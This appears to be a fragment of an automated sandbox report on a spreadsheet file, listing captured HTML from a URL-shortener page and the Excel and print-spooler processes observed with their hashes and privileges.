                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"/><meta name="description" content="undefined is a free and open source URL shortener with custom domains an
                2024-12-20 15:11:55 UTC | 1025 | IN |
                Data Ascii: ":[],"email":null,"apikey":null,"fetched":false}}},"page":"/_error","query":{},"buildId":"um22g2LP8Ko0jk1vHrPCc","isFallback":false,"customServer":true,"gip":true,"appGip":true}</script><script nomodule="" src="/_next/static/runtime/polyfills-52a5f92026ef


                Target ID:0
                Start time:10:10:50
                Start date:20/12/2024
                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                Imagebase:0xf0000
                File size:53'161'064 bytes
                MD5 hash:4A871771235598812032C822E6F68F19
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:7
                Start time:10:11:55
                Start date:20/12/2024
                Path:C:\Windows\splwow64.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\splwow64.exe 12288
                Imagebase:0x7ff715380000
                File size:163'840 bytes
                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:9
                Start time:10:12:19
                Start date:20/12/2024
                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\MS100384UTC.xls"
                Imagebase:0xf0000
                File size:53'161'064 bytes
                MD5 hash:4A871771235598812032C822E6F68F19
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                No disassembly